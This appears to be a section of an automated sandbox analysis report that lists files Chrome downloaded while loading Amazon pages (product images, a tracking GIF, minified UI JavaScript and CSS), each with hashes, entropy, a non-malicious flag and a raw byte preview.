                                                                                                                                                                                                        SSDEEP:384:KSnkwmVXbxj3+KVRiX6kUKgnJbtrmrdZXLYw:BktVU6HCrvXLYw
                                                                                                                                                                                                        MD5:117265DB48EF2796C7887BA184FF0AC7
                                                                                                                                                                                                        SHA1:0C0B8219AC7C23D1DA6E62F924B9A76F1F49949A
                                                                                                                                                                                                        SHA-256:D765E4FE49DB4759861B6FEF195A0AE76421C4AA4F4976EB0E54E746DE079621
                                                                                                                                                                                                        SHA-512:90C416860A6AAD1B0AAB6086302A2D6DD54463FC52FC4F0AC947F1FBE4F3ABB3E4461312C25ABE37B7679ED50B03559EF3E6D5536DF4E06EE77EE168D8EDD822
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5.................................................................m.......M..F.f.X5.'`.....(.-...N.n6!....yI..Ci.z,..^.............Jm..,x..;.f4g.Tw0.<.}:b...(<c..SSS....#..q.t.....9..$s...s....`s..oF......&.P.q-ON^.>..+...b...........E...i..?X9......uq&..F.iJ.....$(.!,j.......l`\y.....J:Rq.SX.u.p.....r...Wz..n,T...S..GyN...d..e(..&.uV..k.......Y2.1..Q......"e..^[5u.t....Uz.K.M4.;p.F.i-.....m...R\.......[FO...J..[....rW.g..kuMr.U.X.4._.O.........8}ekH.....7.....]..,.6s`...N..&\tMO.r*..Q<d.4...NZ[..@c...e]....5..r.q..fUf.....}I.a.u...$..=.=...#l....[].p..T..._[H<......k.;a#%......0Z.E........hX.<.d........G$^...p....}...K.qs.r....0.q..c.....*.!.....e&....^......w.^W.`..c/...i..........Jt..R>.jT.G..,!..ob.........lic.`.QN.J..i..vu.\6eN.r.\R-...[~j...oW..\V..qw..%...+
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 343x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):19142
                                                                                                                                                                                                        Entropy (8bit):7.9653537863738055
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:7rFIIzL7kRY65Nb74wJxC1egYsd9HpkeoiZVYuBuGzQyaxA:tsRY65Nb74BY05ploiZXup+
                                                                                                                                                                                                        MD5:FCB7B1D1947B526AE6073461541CAB28
                                                                                                                                                                                                        SHA1:2729E43602A3EB371A3C949FB1048479AFCCB5FC
                                                                                                                                                                                                        SHA-256:1CB3150FDC12E7E804C584FFC7C6350CB6445FDE72D639AD5A556F2BF01C1DE3
                                                                                                                                                                                                        SHA-512:0FF505A3B4CC75C289C2B785D672880431861CCF61BC4EC925F9751E44396B561A5BFA6AD422F6415715211CFD28E98A5C9149AB3270FF6ED7C82A143394505D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/71F1yxjGeYL._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........W.."..........5...................................................................^..d.Pd.Pd.}.Pw...A..A..A..A..A..).... .. .. .. .. .. .. .X?f..:...ND..[.._....I!$...I.HI!$./Q.i.F.HI..h.Pu.u...5./Q...$.$....._......j...K.......HI#..=^z$..GW..*Sy.........".I./.3.eg...Z..0.Er...:..].veF.%tz.G.$$..A.5..)Y/R.Im...."._h._H._~.._l.#cQDW|.#l.(.....i...ph79.P.8...gOg.P.....ZzL..J.Nk......t...}#.>..W.4.(......G%x..w......y.....t.....MV]...P....s....89.X....1.]A...L.|.OH...-9|.y..|.W.S.,;a....3...'..5....HT....h..I..t..Gi.".P)n.....s#.t^.&d..m........!......l.....>mI.c.=...)...@....2....x.U.[..P.Y."'<..H....q..W.x...O...........C.x..5.b.....al...4..Ua...H.)....i..{B...-.....UT..V4.u..Xa...M.*.v..j*....H....U.WuT.Q..e..[^e.=..i...j.j.0q........x...c..S.s.....P...4.YjW.5--vS...5.[...J......*,3.5.C.[
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (539)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):14537
                                                                                                                                                                                                        Entropy (8bit):5.109451087636145
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:FXEvadr4ziN9k8X1y/wxW/+Irty2vrOTTnm6nflxCClbO8TID23RVhJje8CAE4Av:FUvaV47K1y/wxW/+Irv8frRgsN4L19
                                                                                                                                                                                                        MD5:2F9EADD4CA0C94A2924719DC293335ED
                                                                                                                                                                                                        SHA1:7E87FA031017AB7CAEE9F4BA5A2458B93867C42D
                                                                                                                                                                                                        SHA-256:2E5C4E5DD76D19BD957864A5485880B7DD5381BE31835DC30DBB276D82652A89
                                                                                                                                                                                                        SHA-512:468C17D7F11A4AA83C0161C768855F38416A635759D42F87FD65D906E4072D1A5BCF6CEE02C796FB618BCE852C421A05AD60ECC71CCE7142620D93E722148306
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(function(d){var q=window.AmazonUIPageJS||window.P,n=q._namespace||q.attributeErrors,a=n?n("AmazonUIFormControlsJS","AmazonUI"):q;a.guardFatal?a.guardFatal(d)(a,window):a.execute(function(){d(a,window)})})(function(d,q,n){d.register("prv:a-form-states",function(){function a(a){return function(b){b.removeClass(a)}}function c(a){return function(b){b.addClass(a)}}function b(a){return function(b){return b.hasClass(a)}}return{disabled:{cssClass:"a-form-disabled",disabled:!0,enterState:function(a){a.addClass(this.cssClass);.a.prop("disabled",this.disabled)},exitState:function(a){a.removeClass(this.cssClass);a.prop("disabled",!this.disabled)},match:function(a){return a.hasClass(this.cssClass)&&a.prop("disabled")}},error:{enterState:c("a-form-error"),exitState:a("a-form-error"),match:b("a-form-error")},inactive:{enterState:c("a-form-inactive"),exitState:a("a-form-inactive"),match:b("a-form-inactive")},selected:{enterState:c("a-form-selected"),exitState:a("a-form-selected"),match:b("a-form-sele
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (545)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):7034
                                                                                                                                                                                                        Entropy (8bit):5.398578905632474
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:ZGgX1gw/qSfu6nK3UoB2RK3AlJIITD24PIWEd:ZcwCSfuAhoB2RKuWIzPIHd
                                                                                                                                                                                                        MD5:76AE75376BF0E7C1DFEB1E821CE0666D
                                                                                                                                                                                                        SHA1:5B0187C3F1C3ABA8A5460177CA74C3CD59AE3B3A
                                                                                                                                                                                                        SHA-256:0F12D5A8B677010AB5583B96A8F88C95347857815809A9F4BAF084390409E42B
                                                                                                                                                                                                        SHA-512:0028618A7A0316D4FE16FA1B2AD1867D3E8B86068ACF2FD11FF7892175249CE58F9CCD03638C58BA181E4FDB46CA0C8994A9AEF8F01A6F2148F359012F5E7C54
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:'use strict';mix_d("Carousel-CarouselCards__carousel-v2:carousel-v2__DuAcUHZw","require exports tslib @c/browser-operations @c/remote-operations @c/scoped-dom @c/dom @c/aui-carousel @p/A @p/a-carousel-constants @p/a-carousel-framework @p/a-carousel-strategies".split(" "),function(O,C,e,P,Q,R,S,T,U,V,W,X){function l(a){return a&&"object"===typeof a&&"default"in a?a:{"default":a}}function Y(a){if(a&&a.__esModule)return a;var b=Object.create(null);a&&Object.keys(a).forEach(function(c){if("default"!==.c){var d=Object.getOwnPropertyDescriptor(a,c);Object.defineProperty(b,c,d.get?d:{enumerable:!0,get:function(){return a[c]}})}});b["default"]=a;return b}function Z(){return e.__awaiter(this,void 0,void 0,function(){var a,b,c,d,f,g,k,m,v,aa=this;return e.__generator(this,function(z){switch(z.label){case 0:a=q["default"].cardRoot.getElementsByClassName(D.bottomSheetMoreLikeThis)[0];if(!a)return[3,2];b="."+D.bottomSheetMoreLikeThis.replace(" ",".");return[4,new Promise(function(A,w){O(["@c/aui-bo
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 362x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):13380
                                                                                                                                                                                                        Entropy (8bit):7.9440875764831125
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:a6jQ36CZuoz+sj+WlWEeQ0JoMr9jH8DfCBUk6BioYSpwkxcJlmnhANBwsSOBzJDg:f87vz+M+WlNMrRBUZhHeYOwaJDJch
                                                                                                                                                                                                        MD5:8D7F7AEA2A7A501C898B2D62C221CAA6
                                                                                                                                                                                                        SHA1:C83CA2B2A0A31169DC39CC7AF8021E3FD447D118
                                                                                                                                                                                                        SHA-256:2D6C3940073CEB91ED60B65A6F35096198085CC075543A72856A7EB8197BB2A8
                                                                                                                                                                                                        SHA-512:F15DA91CD92E8B4DC4C0847593FBE6D7DB0DBF5891172A2443BD25E03A038324B1B3C5E4F7932608828190C17657CE5F8C2DBF35D3376A56895BC01CD9CD252A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........j.."..........1.................................................................B..qF.{R.,........[GU....r..~.L...................(.E...l.=x.d..SYtR........<j>."9d..d.iu...G..P.................n.-.g.TN...d.P.....V6.....=d.a............................w..t.}T6..iU..?o.@...\.A.V)?.k...`=....<..io...............]?...#.5.'M.........F.....z=._/.<.f'<.e..n5m...-M...iT.."..gWO.e..p..=...n?.Ye..V.k.=CU.s..P.V..1X...*..sV8...,........$n.3......\.W.`..%"...b...jI.w.yoyj:g,...u..,.bt..M.....d_,..+D_n.WJ.jJ.C.....v........f....VUYt......ej..Tlsx..i..K.l....W..(..Z...:Ee.dR..h..9.T...E.p.K..@n....o.].P[*)..j..=.P...Fi.........E.....+..P.]Q......+..-`....[...u.H&..7....'..-!~k..YWS;I...Hr....i....s.~'...&Xe.............N_..2....J..2LD.....ij.YU:..R.}..O....E.v.s..2....3E....l..\YE..}<.."
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):12914
                                                                                                                                                                                                        Entropy (8bit):7.899040090858498
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:YRg5hcCLUBXeeIRmaPJpuV17ReLBoz1VWvTxhUvc8QXuWRJ3fjoQDQZuf0Ik:YUhNoBYPPGdRTZWTxlNhvfjoQDQyk
                                                                                                                                                                                                        MD5:682A2C97EDA77C422EDD117FC4AEC43B
                                                                                                                                                                                                        SHA1:0A1448C6FB56C68FDE2BAAACC9795499EE4D2FBA
                                                                                                                                                                                                        SHA-256:DEE025E33DFC4BB9DFD84B450EF88BFA2DD25496768AD765CFEA00DC9FDF210B
                                                                                                                                                                                                        SHA-512:1BD3DE86DDBD95F8772991EF23542B6BDBAD159EED439DBE52DB92F4C76508C8AA2BB59B9CC1E89D8966A5BCD6849DC91DE8436AE8BF97003AD87601A5C08778
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................................................................................................................."..........3.............................................................................x.;.3.nT.=...<.!..............[]..j|.\..).<......=...k...W.,.............9w.:........u...v}._a..J.........:......$............vo.~.o; ......c....&..=....K)..zP......d..lyR..YW......l'.&M~.w7.YH......B0u......~any..[......#o..]?C.....i.[...Qvso.b.N.O=..L*...M..;B...,%.....2.>.S.....;...dN..d..l...N.|..'`.vF.q.:#....X*.1. ....:...>..ru...p.0g...#.P......<.w7</.g.c..=..}.[....].b.r.t}.^.r[...\..V.........*...mQ...i...........v..n..i........V-v....Y.Ti...I^y...o...........o~k...<(.{.;..H........F_..F_.O..2|..}.c}......O[.O.]7........{.vw..y.. B.a.........8}....FO.vP.....>....l...7./..#..._9...............v..x..........`..:.z.3.-.e..\.......h..(k..vZ.5...}.n....Q.#.....ZZS.m.i.......... ..VtY.>...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 100x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):8260
                                                                                                                                                                                                        Entropy (8bit):7.954769523438986
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:ySLIzpRkGYR1olv6XM1bBQ35z8Z/BUiLw7W+MVx8ML:vLI1RkGYR18Bqz8/UiLw7W738ML
                                                                                                                                                                                                        MD5:987B1233FF5A8B1321F05CB5EE6DA762
                                                                                                                                                                                                        SHA1:EAAE3D962F537ACDB254E36495F0F625E4B4B51E
                                                                                                                                                                                                        SHA-256:1A1473EED5C920D99E083E494E79C91DA165AAFED41BD27A5F551015DDB7BE46
                                                                                                                                                                                                        SHA-512:5B6E3EC87620A7FB8079E0E60521788469940E519A4DA11D7D6872C34D2A873412AACD1D9F38B97B0105F9FAE31415B5C00336BA94510F25CF02C4EB4EB09B80
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/71-uNsROuoL._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........d.."...............................................................!..1."AQ.2aq..#B....Rbdrs.$3C......%St...........................................................!1.Q..#Aq.2..a."..............?....{.Z...<.*...^.t8.5.odT..._.l..X.f4"..|Y.<....../...O...k.}.=...~...o...MEJ..m.T.....*d...&V>...Yqn.,:xy..?.^.T4mn....lHX...c.....H>X..5[s..7.....DN.}.......).......k..,.q.t.e.-M#....O...I.W.CL.T.Y"R]..]...*.=.q..jc%%4..Y.........``......V....../h..U~....q....z8.?w..u<AKB.GX..-..`.....u.V.p....Te.o,......H.....,.4|.(w.h...ui1.~(A8.".h.jcNt...O..M|..`..n..>.[K.#.LP.nWk.......g...*.P..U.M....?j.y....I..\L|......l[...?S..|....T...P..6..t......lJh....#..rcqc...yg........A..L.h.lf0....oO.h......YUKF..fH.j.w.} .Z.tPX..|.Wfyp.)f.....q....|p+.T...].E.c.....-....w.v..'MGSS3.k.<0..t=$.....,F..`.5.-.2.(...3.Q
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 288x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):15041
                                                                                                                                                                                                        Entropy (8bit):7.957231865511384
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:3qWZ7/yxovw8WQVNjUoO3hITmtYW+WwMVoSUvcO9dIQ:aWZ7/yxvYVNUo48mKWBwM6SUvcOXIQ
                                                                                                                                                                                                        MD5:D32735AE2E217BE348743250F04F80BF
                                                                                                                                                                                                        SHA1:E3B2E39690E5C660D8029A7F552E0CFD04A3C025
                                                                                                                                                                                                        SHA-256:979CED5FF0C4BAA97BAB24BD26032B26EAC5959778B53CD59233BB37D9303879
                                                                                                                                                                                                        SHA-512:05F4243C319728ADABFED326FCC1A6244F4BAF7E9F9C38994718C397D88E1246D7ABDB25CC5BAE2D7CA664245C59B38E11A5131C929094BDDD9C93CCFA23F20A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/81T0Bvf7SSL._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........ .."..........4.................................................................`...e..i..5...C.~.2k..`.<v._.f~.....y.1oB...a.....6^...0.w.k....................ZW.-.......b.V..(...\.Sh.."....rS...9.~..3.....P.T}....y..8.kM0.4..@.(...<.R|Ox.....N>;UYp....T..........!w.6&.V........v.[rT......^o.^..5D.Jy...9.#/....S.....6.q..O./..H..,K...Y..bKOw8...[..ac.E9.u.....=U.).j..).G.w.;<....bIl.../.a.q./i.5ug5-.S........."5..\.._4.^8.._<&.Y...}.F*.r....\V........e../..S.p..j....6W.}.......&M.7....n...fZ.Y...|...fE%0....sf...........X.[....Q.......N.......[Q9n..h...{....Jk1.R'..\S...kwU.4J..lv.....U.M}..k.g.Y.h....Jn=.!.J/6.Z..gVWC.Xv..iTJfq.].g.y....J...9.#...vy.C).(Z)O.a,.}.".+`.....@..".|.}T.!......J.}.....M[.*..b.....3.i`/....\..........'E}.]M.Q7.. .2.v.4.v.4..F....c..z..`.]L......-.=...b:
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 216x226, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5893
                                                                                                                                                                                                        Entropy (8bit):7.912470194550048
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TWRis090mraDlvtkhDyIEb1v4qhqXY6g8OEObLFdlf9wBGezZDVNZ15mHBe+vajK:e09nraDlvtk0IE94e16g8OYZXEBe+vau
                                                                                                                                                                                                        MD5:0BCD84906CC835154FF40B00A5EF29A7
                                                                                                                                                                                                        SHA1:403DD52A24944659D9AAA90B5D9452BF552486D4
                                                                                                                                                                                                        SHA-256:50980B7B069C1AA086DA18A4827A3B6041297E81EDE1FA1FAC449BB0D4931D56
                                                                                                                                                                                                        SHA-512:5AFE219B13E24E84AAAE3959ABE76DACE71F9329A2D449FE2923C2F817FB176DE7DFFEA0032AC4C2049FE8A346593F39A495C06D2366E43A5794C747596E50AC
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!1Q.ATq....."Ras......234BSUr...#5b....%.Ct....D..........................................!A............?..Z...'..F.dpkX.\.4.rI....N...tXTG..|..p....<..v....Vb.}C...q<. ....%....6.BY...c.kkc...a.5.f......._..X.Z.b.. ........s..w.}kC..X.o.....8..x....6!..r...l9u.P**)...`.d.] ..qx.#....,rV......X)f...p.....?..A...&i.;..C.[.G.0g..fq...H.vI...p\..q...w....PO..#Y..9w....lm.H`A&v%.~...+...l.....3eH .H%m.!..........V.V..C|..g.9.m.kQ....=.Z.v)0...#.5.....;.o.}...!..!..!..!..!.._X.8e.O..I;.q...`Tt..xY.'..N..e.A.........V.d'::(......;5...]T.$.......c........C.J.7...V...[...D........[.Z..H.....CC..PL...6#.~..W..u-.r........r\....)..WA#..i.X.g.,qm.#.#.i....?S.:..(.$L...`..l-o..{.q...7]..o.vf.1pu.m...Z.R.}l.J.4.S|.v..p.....F... ..n.A!-/.y.s.].5
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):2140
                                                                                                                                                                                                        Entropy (8bit):7.681064331721705
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:/85m2MxBSNmKeGioYpVBZOQrk/04c0hYaKBb:/8BSsNleGxYHOQrF4c0uZ
                                                                                                                                                                                                        MD5:40DFFE0C2A79542E7871C214C83B9389
                                                                                                                                                                                                        SHA1:8B7180263F4ADEBD0229A7CA24F058804E014EF8
                                                                                                                                                                                                        SHA-256:99FFE00914EC7C4911807777D032D34E7FCF0DB31E86BEDB7A90E7150CFE2D85
                                                                                                                                                                                                        SHA-512:C8636B35DF266BDB5CAA6FDDC60A91F7D27623EB74305850394BA17965AF1DE632C4F9B7ACC4BF51B5980E6FE2000B92414BEBE68FC92BD5A968D7FAE38CBED7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-MmY4MjkxOWIt-w186._SY116_CB642007527_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................."......".$...$.6*&&*6>424>LDDL_Z_||.............................."......".$...$.6*&&*6>424>LDDL_Z_||.......t...."..........5...................................................................................W.*...+B..X."e...l.......5...o|=.+....n...m.5........k.*....y~xKW..G..O.g.........d..j.Z.....-.z..?.2.l|.>.(....O.03.~`...r.eg..>...<.%.-.fU..M=..<}........fQ..{.A.8....N......t..o2......]t....<....<..............N...........................!t.."%12@Qq.$0A.......#456ars.......&37CPRSVcdu..........?...V...0.nrFi.y..9..l.w.#(...S."....2.aJ+1.....1.|M....j5y...Oua..8......5..1...S..BO.2.....m..j8..S.}..M-.%n.s..q.h.>9.U..Y..V..}.Z.2..(8..3.r.[3.J<..iv.[P..a.2C.h.~.77W.zXv....Y...Ur:3!..`..y....i7qE.R.:M..<..-<...q.hX.....9.P....Q..TP.t.-..Q`>,..J.......C.R...LT.*.......P=..Ll.g.Sj.(..vLa....^....]9...B.!m>.v7.......1>.5LZ_w+..]...&....?.s`........9.Q..b.NW`.....[{0...j...=cT^..=...Qc`s<........Q.k.u...+I..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 250x255, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):11032
                                                                                                                                                                                                        Entropy (8bit):7.9341964749044935
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:KTZ+jGpYwxglRdbfyHhYJKfx6JKLP0yqpBC4k/8uGrW7f7eiz4l5dt:KI+HxiJZQxVLPROQ4k374l/t
                                                                                                                                                                                                        MD5:9C72C1E38D447EEE7893DA87B3940BA9
                                                                                                                                                                                                        SHA1:A33FD8F2DCA9038EA44D360FD7E21D23F876EB22
                                                                                                                                                                                                        SHA-256:14D6D71D9026C4B5FC4BACD6F55FBDC03BB8E44036C9E5F09B7A95CD151A1AB8
                                                                                                                                                                                                        SHA-512:B21F034FF5DEA1E762CD2064358E1A8D0A0D4AB2D3E10CB43200D83DE056F5D1C4D93161519CF69852B34694C2993167E3EEB8A51DF3BE3484B7EB6E11F4735A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........6...................................................................>[...=.YV...]8...M...c.jSq.=s....p~........[c..m.....a.wr..).......=}.F.P.y.C_(..=`...r.Sm..}.:.....c..1l..uuW....P....^/...,|....w6.d..V......l.?...,....Y.W5.......r}Wt..m..m?5u........+......A.(.:..........^..<...zQ9..k..w..v9.......).=-.@.....1y....T'>.-g.Xe.c......0Q]<.....L.L.e...2...@...B..5...D..TWR...f.a....#+6...!.Ba.=.e,.O.......}y\LWs.Gr....Q.P.u.]5..-GIcr.CqW..]-_.S.U=....k.~......k..b...K.x.z#.x....NVmP.....&.....-.$\......d..?..;.....)-..g...4..]..>..Z.E.Oz:.aQ.6....N......Ct/>.Z._.......,.]...,.1.)..L.6....}m.;}-._Y(S.`q.yq..w.U.]SX^.v...qWuqg..v.Ay.~...Q...8..G.Nr.Xl.c./.n.C........$..-....T....V.ZU[.e9H...k.u.\L...y.qR.A..C.~....:.f.jv|..X.,...*...5!..b......D{.DG......[..pGSw.7
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (12670), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):12670
                                                                                                                                                                                                        Entropy (8bit):4.754877085064918
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:YiwsJxNArHaBwcPNGXtGPrXgJjYWHKwatR2Z:TZCaicP1pWqnt4
                                                                                                                                                                                                        MD5:C22C1A63E37A5A7C744B7BC69C46F1D1
                                                                                                                                                                                                        SHA1:A70F7D7046A33113545AE6E7A9E820B91B10DDFF
                                                                                                                                                                                                        SHA-256:3C0695AF3E6D88F5B045BBE9780CF6FF59631CD0CE7E4719132075E57260D998
                                                                                                                                                                                                        SHA-512:919A489957FDC0D2DD128912B864162EB7C6647B5DB6C08B95F073ECC0A1B7F9887511249FB7ABA3ACFA4AD86BDF9BD3C415CED351D62CCC4A2DD16D65A80FA5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/I/31MfUzZkHxL.css?AUIClients/F3CommonCartAssets&yMRr+P3v
                                                                                                                                                                                                        Preview:.sc-localmarket-cart .sc-carts-expand-link{float:right;position:relative;top:50%;-webkit-transform:translateY(-50%);-moz-transform:translateY(-50%);-ms-transform:translateY(-50%);-o-transform:translateY(-50%);transform:translateY(-50%);margin-left:32px}.sc-localmarket-cart .sc-carts-expand-link .a-icon{margin-left:0}.sc-localmarket-cart a.sc-collapsed-item-thumbnails{text-decoration:none}#sc-localmarket-item-update-message{position:fixed;top:0;left:0;right:0;z-index:500;background-color:#EBFAEB;margin:0;padding:10px 20px;transition-timing-function:ease-out}#localMarketRecommendations{position:relative}.sc-group-category-title{border-radius:4px;margin-left:8px;margin-right:8px;margin-bottom:8px;padding:0;background-color:#fff}.sc-localmarket-cart.sc-localmarket-collapsed-cart .sc-collapsed-cart-link{border:0}.sc-localmarket-cart.sc-localmarket-collapsed-cart .sc-collapsed-item-list{display:inline-block;overflow:hidden;height:100px;margin-top:35px;margin-right:20px}.sc-localmarket-cart.s
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 250x389, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):4575
                                                                                                                                                                                                        Entropy (8bit):7.788664238947448
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TV5QBV4QO1sQtyAk6fpciNY6mE+U7vzjlfhX8SVr2qy8kS:AB21sQtzk6fpciWwvvzjlZX8SVqakS
                                                                                                                                                                                                        MD5:43F388E4DA9AFC215A3645AB09C0101B
                                                                                                                                                                                                        SHA1:10452E17F6E5FF5ABF8115B9F36AAAF278EAEF7A
                                                                                                                                                                                                        SHA-256:C71986006E0321D1CBD01E1D513DA3C5C553F5926D8CEE69D296DE8CDED769DB
                                                                                                                                                                                                        SHA-512:E80D60A3DB31EC423FF69CEDC1BF8A2E5A8AC614612D292688C28F3A0FA037C9E006A819E1E75DC5CE1F69380D262F18A662B85DFDC2F2E8F81AA5439004E686
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/31i1PvcIFgL.AC_SX250.jpg
